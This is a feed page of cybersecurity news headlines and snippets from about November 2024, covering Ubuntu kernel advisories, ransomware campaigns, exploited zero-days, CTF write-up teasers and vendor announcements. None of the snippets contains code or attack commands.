Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system. This update corrects flaws in the following subsystems: - ARM64 architecture; - S390 architecture; - x86 architecture; - Block layer subsystem; - Cryptographic API; - ATM drivers; - Device frequency scaling framework; - GPU drivers; - Hardware monitoring drivers; - VMware VMCI Driver; - Network drivers; - Device tree and open firmware driver; - SCSI drivers; - Greybus lights staging drivers; - BTRFS file system; - File systems infrastructure; - F2FS file system; - JFS file system; - NILFS2 file system; - Netfilter; - Memory management; - Ethernet bridge; - IPv6 networking; - IUCV driver; - Logical Link layer; - MAC80211...
https://ubuntu.com/security/notices/USN-7121-2
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

USN-7123-1: Linux kernel (Azure) vulnerabilities
It was discovered that the CIFS network file system implementation in the Linux kernel did not properly validate certain SMB messages, leading to an out-of-bounds read vulnerability. An attacker could use this to cause a denial of service (system crash) or possibly expose sensitive information. (CVE-2023-6610) Supraja Sridhara, Benedict Schlüter, Mark Kuhne, Andrin Bertschi, and Shweta Shinde discovered that the Confidential Computing framework in the Linux kernel for x86 platforms did not properly handle 32-bit emulation on TDX and SEV. An attacker with access to the VMM could use this to cause a denial of service (guest crash) or possibly execute arbitrary code. (CVE-2024-25744) Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise...
https://ubuntu.com/security/notices/USN-7123-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AlmaLinux 9.5 Released: Exploring Key Updates & Improvements
Upgrading and maintaining your operating system is crucial to optimal performance and security. AlmaLinux, a widely used open-source Linux distribution, recently released version 9.5 with new features and security enhancements that will benefit any admin or organization running
https://linuxsecurity.com/news/security-projects/almalinux-9-5-released-exploring-key-updates-improvements
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Dual Edge of Open Source: Examining Key Benefits and Security Challenges
Open-source software (OSS) adoption has increased dramatically over recent years due to its flexibility and cost-cutting benefits, but whether or not OSS is completely safe is often controversial. Due to its open and collaborative nature, this type of software presents unique advantages and security challenges.
https://linuxsecurity.com/features/features/examining-open-source-benefits-security-challenges
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Update now! Apple confirms vulnerabilities are already being exploited
Apple has released security updates that look especially important for Intel-based Macs because they are already being exploited in the wild.
https://www.malwarebytes.com/blog/news/2024/11/update-now-apple-confirms-vulnerabilities-are-being-exploited
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Analyzing the Emergence of Helldown Ransomware Targeting Linux & VMware Systems
Recently, cybersecurity researchers discovered a Linux variant of the Helldown ransomware strain . This finding signals that threat actors have begun targeting VMware and Linux systems as attack vectors, indicating an increased focus on such platforms for attacks targeting Linux-based machines.
https://linuxsecurity.com/news/hackscracks/helldown-ransomware-targeting-linux-vmware-systems
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Mitigating the Risk of Cybercrime While Traveling Abroad
Global tourism is reaching pre-pandemic records and many people are eager to embark on a new adventure. Yet at the same time, incidents of cybercrimes are increasing at a staggering... The post Mitigating the Risk of Cybercrime While Traveling Abroad appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/mitigating-the-risk-of-cybercrime-while-traveling-abroad/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How Bitcoin's digital signature feature facilitates Web3 adoption
Bitcoin is a pioneer in technological advancement and decentralization. As its creator states in the white paper, peer-to-peer…
https://hackread.com/bitcoin-digital-signature-feature-web3-adoption/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Linux Variant of Helldown Ransomware Targets VMware ESX Servers
Cybersecurity firm Sekoia has discovered a new variant of Helldown ransomware. The article details their tactics and how…
https://hackread.com/helldown-ransomware-linux-variant-vmware-esx-servers/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Threat Assessment: Ignoble Scorpius, Distributors of BlackSuit Ransomware
Explore this assessment on cybercrime group Ignoble Scorpius, distributors of BlackSuit ransomware. Since May 2023, operations have increased —affecting critical sectors. The post Threat Assessment: Ignoble Scorpius, Distributors of BlackSuit Ransomware appeared first on Unit 42.
https://unit42.paloaltonetworks.com/threat-assessment-blacksuit-ransomware-ignoble-scorpius/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Apple addressed two actively exploited zero-day vulnerabilities
Apple released security updates for iOS, iPadOS, macOS, visionOS, and Safari browser to address two actively exploited zero-day flaws. Apple released security updates for two zero-day vulnerabilities, tracked as CVE-2024-44309 and CVE-2024-44308, in iOS, iPadOS, macOS, visionOS, and Safari web browser, which are actively exploited in the wild. The vulnerability CVE-2024-44309 is a cookie management issue […]
https://securityaffairs.com/171202/security/apple-fixed-2-actively-exploited-zero-day-bugs.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AI Granny Daisy takes up scammers' time so they can't bother you
An Artificial Intelligence model called Daisy has been deployed to waste phone scammers' time so they can't defraud real people.
https://www.malwarebytes.com/blog/news/2024/11/ai-granny-daisy-takes-up-scammers-time-so-they-cant-bother-you
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Glove Stealer Emerges A New Malware Threat For Browsers
Researchers discovered a new malware running active campaigns in the wild, infecting browsers. Identified as… Glove Stealer Emerges A New Malware Threat For Browsers on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/11/20/glove-stealer-emerges-a-new-malware-threat-for-browsers/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Future of Mobile Security: Emerging Threats and Countermeasures
As mobile devices like smartphones and tablets become increasingly ubiquitous, mobile security is more important… The Future of Mobile Security: Emerging Threats and Countermeasures on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/11/20/the-future-of-mobile-security-emerging-threats-and-countermeasures/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

African Reliance on Foreign Suppliers Boosts Insecurity Concerns
Recent backdoor implants and cyber-espionage attacks on their supply chains have African organizations looking to diversify beyond Chinese, American tech vendors.
https://www.darkreading.com/cyber-risk/african-reliance-on-foreign-suppliers-boosts-insecurity
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Unsecured JupyterLab and Jupyter Notebooks servers abused for illegal streaming of Sports events
Threat actors exploit misconfigured JupyterLab and Jupyter Notebooks servers to rip sports streams and illegally redistribute them. Researchers from security firm Aqua observed threat actors exploiting misconfigured JupyterLab and Jupyter Notebook servers to hijack environments, deploy streaming tools, and duplicate live sports broadcasts on illegal platforms. “threat actors using misconfigured servers to hijack environments for […]
https://securityaffairs.com/171193/cyber-crime/misconfigured-jupyterlab-and-jupyter-notebooks-illegal-live-sports-streaming.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

DeepTempo Launches AI-Based Security App for Snowflake
DeepTempo's Tempo is a deep learning-based Snowflake native app that allows organizations to detect and respond to evolving threats directly within their Snowflake environments.
https://www.darkreading.com/cybersecurity-operations/untitled
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How HackerOne Employees Stay Connected and Have Fun

https://www.hackerone.com/culture-and-talent/how-hackerone-employees-stay-connected-and-have-fun
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Fintech Giant Finastra Investigating Data Breach
The financial technology firm Finastra is investigating the alleged large-scale theft of information from its internal file transfer platform, KrebsOnSecurity has learned. Finastra, which provides software and services to 45 of the world's top 50 banks, notified customers of a potential breach after a cybercriminal began selling more than 400 gigabytes of data purportedly stolen from the company.
https://krebsonsecurity.com/2024/11/fintech-giant-finastra-investigating-data-breach/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

RIIG Launches With Risk Intelligence Solutions
RIIG is a risk intelligence and cybersecurity solutions provider offering open source intelligence solutions designed for zero-trust environments.
https://www.darkreading.com/cyber-risk/riig-launches-risk-intelligence-solutions
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

SWEEPS Educational Initiative Offers Application Security Training
The secure coding curriculum, funded by a .5 million grant, is available for students and professionals at all stages of their careers.
https://www.darkreading.com/application-security/sweeps-educational-initiative-application-security-training
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

L'Actu à J-2 (Presse spécialisée)

USN-7122-1: Linux kernel vulnerability
A security issue was discovered in the Linux kernel. An attacker could possibly use this to compromise the system. This update corrects flaws in the following subsystems: - x86 architecture;
https://ubuntu.com/security/notices/USN-7122-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

USN-7121-1: Linux kernel vulnerabilities
Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system. This update corrects flaws in the following subsystems: - ARM64 architecture; - S390 architecture; - x86 architecture; - Block layer subsystem; - Cryptographic API; - ATM drivers; - Device frequency scaling framework; - GPU drivers; - Hardware monitoring drivers; - VMware VMCI Driver; - Network drivers; - Device tree and open firmware driver; - SCSI drivers; - Greybus lights staging drivers; - BTRFS file system; - File systems infrastructure; - F2FS file system; - JFS file system; - NILFS2 file system; - Netfilter; - Memory management; - Ethernet bridge; - IPv6 networking; - IUCV driver; - Logical Link layer; - MAC80211...
https://ubuntu.com/security/notices/USN-7121-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

USN-7120-1: Linux kernel vulnerabilities
Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system. This update corrects flaws in the following subsystems: - File systems infrastructure; - Network traffic control; (CVE-2024-46800, CVE-2024-43882)
https://ubuntu.com/security/notices/USN-7120-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

USN-7119-1: Linux kernel (IoT) vulnerabilities
Ziming Zhang discovered that the VMware Virtual GPU DRM driver in the Linux kernel contained an integer overflow vulnerability. A local attacker could use this to cause a denial of service (system crash). (CVE-2022-36402) Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system. This update corrects flaws in the following subsystems: - ARM64 architecture; - PowerPC architecture; - User-Mode Linux (UML); - x86 architecture; - Block layer subsystem; - Cryptographic API; - Android drivers; - Serial ATA and Parallel ATA drivers; - ATM drivers; - Drivers core; - CPU frequency scaling framework; - Device frequency scaling framework; - GPU drivers; - HID subsystem; - Hardware monitoring drivers; - InfiniBand...
https://ubuntu.com/security/notices/USN-7119-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Russian Phobos ransomware operator faces cybercrime charges
Russian Phobos ransomware operator Evgenii Ptitsyn, accused of managing attacks, was extradited from South Korea to the US to face cybercrime charges. Russian Phobos ransomware operator Evgenii Ptitsyn, suspected of playing a key role in the ransomware operations, was extradited from South Korea to the US to face cybercrime charges. According to the DoJ, the […]
https://securityaffairs.com/171184/cyber-crime/phobos-ransomware-operator-faces-cybercrime-charges.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

USN-7089-7: Linux kernel (Low Latency) vulnerabilities
Chenyuan Yang discovered that the USB Gadget subsystem in the Linux kernel did not properly check for the device to be enabled before writing. A local attacker could possibly use this to cause a denial of service. (CVE-2024-25741) Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system. This update corrects flaws in the following subsystems: - ARM32 architecture; - MIPS architecture; - PA-RISC architecture; - PowerPC architecture; - RISC-V architecture; - S390 architecture; - x86 architecture; - Cryptographic API; - Serial ATA and Parallel ATA drivers; - Null block device driver; - Bluetooth drivers; - Cdrom driver; - Clock framework and drivers; - Hardware crypto device drivers; - CXL (Compute...
https://ubuntu.com/security/notices/USN-7089-7
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Apple fixes two zero-days used in attacks on Intel-based Macs
Apple released emergency security updates to fix two zero-day vulnerabilities that were exploited in attacks on Intel-based Mac systems. [...]
https://www.bleepingcomputer.com/news/security/apple-fixes-two-zero-days-used-in-attacks-on-intel-based-macs/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Linux Variant of Helldown Ransomware Targets VMware ESXi Systems
Since surfacing in August, the likely LockBit variant has claimed more than two dozen victims and appears poised to strike many more.
https://www.darkreading.com/cyberattacks-data-breaches/linux-variant-helldown-ransomware-targets-vmware
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CISA tags Progress Kemp LoadMaster flaw as exploited in attacks
The U.S. Cybersecurity & Infrastructure Security Agency (CISA) has added three new flaws in its Known Exploited Vulnerabilities (KEV) catalog, including a critical OS command injection impacting Progress Kemp LoadMaster. [...]
https://www.bleepingcomputer.com/news/security/cisa-tags-progress-kemp-loadmaster-flaw-as-exploited-in-attacks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AI-Powered Cybersecurity: Safeguarding the Media Industry
Written by Satyavathi Divadari, Founder and President of the CSA Bangalore Chapter, in collaboration with the AI Technology and Risk Working Group.In the fast-paced world of media, where delivering authentic news quickly is essential, cybersecurity plays a critical role in protecting data, ensuring privacy, and upholding journalistic standards. With my experience as a Director of Cybersecurity for a media company, I've observed the complexities of implementing cybersecurity in the media indus...
https://cloudsecurityalliance.org/articles/ai-powered-cybersecurity-safeguarding-the-media-industry
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

5 Big Cybersecurity Laws You Need to Know About Ahead of 2025
Originally published by Schellman.Written by Jordan Hicks.Generally, with new cybersecurity regulations, organizations affected are provided a “grace period” to make the necessary adjustments to achieve full compliance before enforcement begins. Looking toward the horizon and 2025, many new laws will be coming into full effect, which means organizations will now likely be subject to various penalties if they're not ready and haven't satisfied all relevant requirements.So, are you ready? We kn...
https://cloudsecurityalliance.org/articles/5-big-cybersecurity-laws-you-need-to-know-about-ahead-of-2025
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

A Easy P4 in 10 min The Story of Finding Interesting Vulnerability inVDP program
In the world of cybersecurity, vulnerabilities can lead to severe consequences for organizations and their users. A recent discovery of a No Rate Limiting vulnerability in the PickMyCareer web application has raised alarms due to its potential for abuse, including database hijacking and SMS flooding. This blog will explore the details of this vulnerability, its impact, and the importance of implementing proper security measures to mitigate such risks.Overview of the VulnerabilityVulnerability Name: No Rate LimitingDescription: The absence of rate limiting in the registration endpoint allows an attacker to create an excessive number of accounts rapidly — over 10,000 accounts in less than a minute. This vulnerability can be exploited to hijack database storage and take advantage of SMTP...
https://infosecwriteups.com/the-story-of-finding-and-mitigating-no-rate-limiting-vulnerability-in-pickmycareer-7b2653d18bbc?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

HTB — Included
Can you enumerate your way to the top?Continue reading on InfoSec Write-ups »
https://infosecwriteups.com/htb-included-cba3eb482413?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Leviathan6 : Over The Wire
Leviathan6 : Over The WireOverviewLeviathan Level 6 is part of the OverTheWire CTF (Capture The Flag) challenges, designed to enhance your understanding of Linux command-line tools, basic scripting, and reverse engineering. In this level, the player is tasked with finding a 4-digit password to progress to the next level. The executable `leviathan6` prompts the user for this password, and the challenge lies in discovering the correct code through brute force or analysis.ObjectiveThe main goal is to execute the `leviathan6` binary located in the user's home directory and provide it with the correct 4-digit code. Successfully entering this code allows access to the next level, `leviathan7`.Initial ExplorationThis indicates that the program requires a 4-digit code as an argument.Brute-Forcing...
https://infosecwriteups.com/leviathan6-over-the-wire-1f2363918462?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

A Step-by-Step Walkthrough of the Netsquare CTF Challenge
Hello Everyone,My name is Praveen Mali (PMMALI), and I am a Cybersecurity Analyst.Today, I am excited to share the write-up for a Capture The Flag (CTF) challenge I created for our organization. In this CTF, I designed both web and network-based challenges.As the creator of this CTF, I've thoroughly crafted each challenge to engage participants with different attack vectors and vulnerabilities. Now, I'm writing this walkthrough from the perspective of a participant, outlining the steps to solve each challenge and ultimately capture all the flags.To begin, download the OVA file from the provided link, install it, and set it up on your local machine. Make sure to configure the network adapter in the settings. Once the setup is complete, you're ready to get started.For this write-up,...
https://infosecwriteups.com/a-step-by-step-walkthrough-of-the-netsquare-ctf-challenge-58212b63d44b?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Defending Web Portals: Harnessing ModSecurity, Honeypots, and AppSensor for Robust Security
Modern cybersecurity isn't just about building impenetrable walls; it's about sounding the alarm the moment someone tries to climb overThe modern web landscape is fraught with evolving and increasingly sophisticated threats targeting web portals and applications. Cybercriminals exploit vulnerabilities through automated bot attacks, advanced penetration testing, and targeted manual exploits. To effectively defend against these threats, a multi-layered approach is essential — one that combines proactive defense mechanisms, intelligent monitoring, and real-time response systems.In this journal, we delve into a holistic defense strategy for protecting web portals. By combining ModSecurity (a web application firewall), Application-Level Honeypots, and OWASP AppSensor, organizations...
https://infosecwriteups.com/defending-web-portals-harnessing-modsecurity-honeypots-and-appsensor-for-robust-security-38526db8593d?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ford rejects breach allegations, says customer data not impacted
Ford is investigating allegations that it suffered a data breach after a threat actor claimed to leak 44,000 customer records on a hacking forum. [...]
https://www.bleepingcomputer.com/news/security/ford-rejects-breach-allegations-says-customer-data-not-impacted/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Oracle warns of Agile PLM file disclosure flaw exploited in attacks
Oracle has fixed an unauthenticated file disclosure flaw in Oracle Agile Product Lifecycle Management (PLM) tracked as CVE-2024-21287, which was actively exploited as a zero-day to download files. [...]
https://www.bleepingcomputer.com/news/security/oracle-warns-of-agile-plm-file-disclosure-flaw-exploited-in-attacks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Lost Art of Visibility, in the World of Clouds
Written by Vito Nozza, Softchoice.“The power of visibility can never be underestimated” Margaret ChoAs many of you have read my past blogs, I like to quote individuals who have had experience in certain subjects. Although the above quote was meant for a different context, it bears true for this conversation. The value in the adoption of cloud-based services has skyrocketed over the last 10 years. The ability for companies to utilize the cloud's flexible, scalable, and cost-effective computing...
https://cloudsecurityalliance.org/articles/the-lost-art-of-visibility-in-the-world-of-clouds
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Russian Ransomware Gangs on the Hunt for Pen Testers
In further proof of the professionalization of Russian cybercriminal groups, ransomware gangs have been posting job ads for security positions such as pen testers, looking to boost their ransomware deployment operations.
https://www.darkreading.com/vulnerabilities-threats/russian-ransomware-gangs-hunt-pen-testers
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

USN-7117-1: needrestart and Module::ScanDeps vulnerabilities
Qualys discovered that needrestart passed unsanitized data to a library (libmodule-scandeps-perl) which expects safe input. A local attacker could possibly use this issue to execute arbitrary code as root. (CVE-2024-11003) Qualys discovered that the library libmodule-scandeps-perl incorrectly parsed perl code. This could allow a local attacker to execute arbitrary shell commands. (CVE-2024-10224) Qualys discovered that needrestart incorrectly used the PYTHONPATH environment variable to spawn a new Python interpreter. A local attacker could possibly use this issue to execute arbitrary code as root. (CVE-2024-48990) Qualys discovered that needrestart incorrectly checked the path to the Python interpreter. A local attacker could possibly use this issue to win a race condition and execute...
https://ubuntu.com/security/notices/USN-7117-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Rapid7 Recognized for ‘Excellence in Workplace Health and Wellbeing' at the Belfast Telegraph IT Awards
On Friday, November 15th, Rapid7 was awarded ‘Excellence in Workplace Health and Wellbeing' at the Belfast Telegraph IT Awards. This award recognizes technology companies in Belfast that prioritize employee well-being.
https://blog.rapid7.com/2024/11/19/rapid7-recognized-for-excellence-in-workplace-health-and-wellbeing-at-the-belfast-telegraph-it-awards/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

From Concept to Launch: Ensuring Cybersecurity in Product Development
Developing a new product requires coordinating many moving parts, from initial conception to final launch.… From Concept to Launch: Ensuring Cybersecurity in Product Development on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/11/19/from-concept-to-launch-ensuring-cybersecurity-in-product-development/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Russian Man Extradited to US, Face Charges in Phobos Ransomware Operation
Russian national Evgenii Ptitsyn, linked to Phobos ransomware, faces U.S. charges for extortion and hacking, with over M…
https://hackread.com/russian-hacker-extradite-us-phobos-ransomware-charges/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Legit Secrets Detection & Prevention: Free 14-Day Trial Now Available!
Get a free trial of the Legit secrets scanner to understand the capabilities of modern secrets scanning. 
https://www.legitsecurity.com/blog/legit-secrets-detection-prevention-free-trial
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

China-linked actor's malware DeepData exploits FortiClient VPN zero-day
Chinese threat actors use custom post-exploitation toolkit ‘DeepData’ to exploit FortiClient VPN zero-day and steal credentials. Volexity researchers discovered a vulnerability in Fortinet’s Windows VPN client that China-linked threat actor BrazenBamboo abused in their DEEPDATA malware. BrazenBamboo is known to be the author of other malware families, including LIGHTSPY, DEEPDATA, and DEEPPOST. DEEPDATA is a […]
https://securityaffairs.com/171173/security/china-linked-actors-malware-deepdata-exploits-forticlient-vpn-zero-day.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Weekly Detection Rule (YARA and Snort) Information – Week 3, November 2024
The following is the information on Yara and Snort rules (week 3, November 2024) collected and shared by the AhnLab TIP service. 1 YARA Rules Detection name Description Source MAL_ELF_Xlogin_Nov24_1 Detects xlogin backdoor samples https://github.com/Neo23x0/signature-base 4 Snort Rules Detection name Source ET WEB_SPECIFIC_APPS Symphony PHP Symfony Profiler Environment Manipulation (CVE-2024-50340) https://rules.emergingthreatspro.com/open/ ET WEB_SPECIFIC_APPS Citrix Session […] 게시물 Weekly Detection Rule (YARA and Snort) Information – Week 3, November 2024이 ASEC에 처음 등장했습니다.
https://asec.ahnlab.com/en/84652/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Free AI editor lures in victims, installs information stealer instead on Windows and Mac
A widespread social media campaign for EditProAI turns out to spread information stealers for both Windows and MacOS users.
https://www.malwarebytes.com/blog/news/2024/11/free-ai-editor-lures-in-victims-installs-information-stealer-instead-on-windows-and-mac
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

HackTheBox Writeup — Easy Machine Walkthrough
HTB Guided Mode WalkthroughContinue reading on InfoSec Write-ups »
https://infosecwriteups.com/hackthebox-writeup-easy-machine-walkthrough-a99d7696dd62?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Pivoting in Penetration Testing: A Comprehensive Guide
Pivoting is a vital technique in penetration testing that allows an attacker to exploit a compromised system to access deeper layers of a target network. It's the art of leveraging initial access to one machine to explore, exploit, and gain control over other machines in the same network. This guide delves into the essentials of pivoting, providing practical techniques and tools to enhance your understanding.Why Pivoting is Essential ?Most networks are segmented, with sensitive systems hidden behind layers of security. Initial access, such as exploiting a public-facing server, rarely grants direct access to critical systems. Pivoting bridges this gap, enabling lateral movement within the network to target these hidden assets.Example Scenario: Imagine a network with four machines:One public-facing...
https://infosecwriteups.com/pivoting-in-penetration-testing-a-comprehensive-guide-cfa090e45ee0?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Rethinking Cybersecurity From Cost Center To Value Driver
This week in cybersecurity from the editors at Cybercrime Magazine –Read the Full Forbes Story Sausalito, Calif. – Nov. 19, 2024 Historically, many businesses have approached cybersecurity as a checkbox exercise: invest just enough to comply with regulations (and avoid a fine) and protect against The post Rethinking Cybersecurity From Cost Center To Value Driver appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/rethinking-cybersecurity-from-cost-center-to-value-driver/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Accelerate Mean Time to Exposure Remediation Across Hybrid Environments with Remediation Hub
Rapid7's Remediation Hub, our newest addition to the Exposure Command platform. Remediation Hub automatically prioritizes various risk signals across your hybrid environment and suggests the actions your team can take that would have the largest impact on reducing your overall risk posture.
https://blog.rapid7.com/2024/11/19/accelerate-mean-time-to-exposure-remediation-across-hybrid-environments-with-remediation-hub/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Communication platforms play a major role in data breach risks
Every online activity or task brings at least some level of cybersecurity risk, but some have more risk than others. Kiteworks Sensitive Content Communications Report found that this is especially true when it comes to using communication tools. When it comes to cybersecurity, communicating means more than just talking to another person; it includes any […] The post Communication platforms play a major role in data breach risks appeared first on Security Intelligence.
https://securityintelligence.com/articles/communication-platforms-major-role-in-data-breach-risks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Enhancing Traveler Data Security: Best Practices for Managing Sensitive Info
Protect traveler data with these tips: use VPNs, manage app permissions, and secure travel documents. Travel companies should…
https://hackread.com/traveler-data-security-practices-managing-sensitive-info/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AI is everywhere, and Boomers don't trust it
ChatGPT, Google Gemini, and Meta AI may be everywhere, but Baby Boomers don't trust the tech or the companies behind it.
https://www.malwarebytes.com/blog/news/2024/11/ai-is-everywhere-and-boomers-dont-trust-it
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Gen Q3/2024 Threat Report
The third quarter threat report is here—and it's packed with answers. Our Threat Labs team had uncovered some heavy stories behind the stats, exposing the relentless tactics shaping today's threat landscape. Here's what you need to know: This is just the surface. Read the full report and see how our Threat Labs team is relentlessly […] The post Gen Q3/2024 Threat Report appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/gen-q3-2024-threat-report/?utm_source=rss&utm_medium=rss&utm_campaign=gen-q3-2024-threat-report
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AI innovations for a more secure future unveiled at Microsoft Ignite
Company delivers advances in AI and posture management, unprecedented bug bounty program, and updates on its Secure Future Initiative. The post AI innovations for a more secure future unveiled at Microsoft Ignite appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/11/19/ai-innovations-for-a-more-secure-future-unveiled-at-microsoft-ignite/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Critical Windows Kerberos Flaw Exposes Millions of Servers to Attack
A critical vulnerability in the Windows Kerberos authentication protocol poses a significant risk to millions of servers. Microsoft…
https://hackread.com/windows-kerberos-flaw-millions-of-servers-attack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Maintaining File Security While Working Remotely
These days remote workers in home offices using residential WiFi must maintain a similar security posture as a full-on corporation while working with other remote stakeholders, clients, and partners anywhere... The post Maintaining File Security While Working Remotely appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/maintaining-file-security-while-working-remotely/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cloud Security Alliance Announces Winners of the 2024 Juanita Koilpillai Awards
Award honors volunteers for their valuable contributions towards fulfilling CSA's mission of promoting best practices to help ensure a secure cloud computing environmentSEATTLE – Nov. 20, 2024 – The Cloud Security Alliance (CSA), the world's leading organization dedicated to defining and raising awareness of best practices to help ensure a secure cloud computing environment, is pleased to announce the winners of the 2024 Juanita Koilpillai Award. The award, first established in 2012 as the Ro...
https://cloudsecurityalliance.org/articles/csa-announces-winners-of-the-2024-juanita-koilpillai-awards
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

FrostyGoop's Zoom-In: A Closer Look into the Malware Artifacts, Behaviors and Network Communications
We analyze FrostyGoop malware, which targets OT systems. This article walks through newly discovered samples, indicators, and also examines configurations and network communications. The post FrostyGoop's Zoom-In: A Closer Look into the Malware Artifacts, Behaviors and Network Communications appeared first on Unit 42.
https://unit42.paloaltonetworks.com/frostygoop-malware-analysis/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Unlocking the Power and Potential of GenAI in Software Development
As GenAI becomes an indispensable tool in software development, organizations are embracing its ability to drive innovation and streamline operations. But this rapid adoption brings with it significant challenges in security, governance, and visibility. 
https://www.legitsecurity.com/blog/unlocking-the-power-and-potential-of-genai-in-software-development
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Scammer Black Friday offers: Online shopping threats and dark web sales
Kaspersky experts share their insights into cyberthreats that face online shoppers in 2024: phishing, banking trojans, fake shopping apps and Black Friday sales on the dark web data market.
https://securelist.com/black-friday-report-2024/114589/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

What Exactly is Telematics? The Technology That's Changing How We Drive
Telematics is transforming the driving experience by merging telecommunications and informatics to monitor vehicle data… What Exactly is Telematics? The Technology That’s Changing How We Drive on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/11/19/what-exactly-is-telematics-the-technology-thats-changing-how-we-drive/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

U.S. CISA adds Progress Kemp LoadMaster, Palo Alto Networks PAN-OS and Expedition bugs to its Known Exploited Vulnerabilities catalog
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Progress Kemp LoadMaster, Palo Alto Networks PAN-OS and Expedition bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: Below are the descriptions of the above vulnerabilities: CVE-2024-1212 is a Progress Kemp LoadMaster […]
https://securityaffairs.com/171168/security/u-s-cisa-progress-kemp-loadmaster-palo-alto-networks-pan-os-and-expedition-bugs-known-exploited-vulnerabilities-catalog.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Great Plains Regional Medical Center ransomware attack impacted 133,000 individuals
A ransomware attack on Great Plains Regional Medical Center compromised personal data of 133,000 individuals, exposing sensitive information. On September 8, 2024, Great Plains Regional Medical Center (Oklahoma) suffered a ransomware attack. The organization launched an investigation into the incident with the help of a cybersecurity firm. The healthcare center discovered that a threat actor […]
https://securityaffairs.com/171156/data-breach/great-plains-regional-medical-center-data-breach.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Palo Alto Expedition Missing Authentication Vulnerability (CVE-2024-5910)
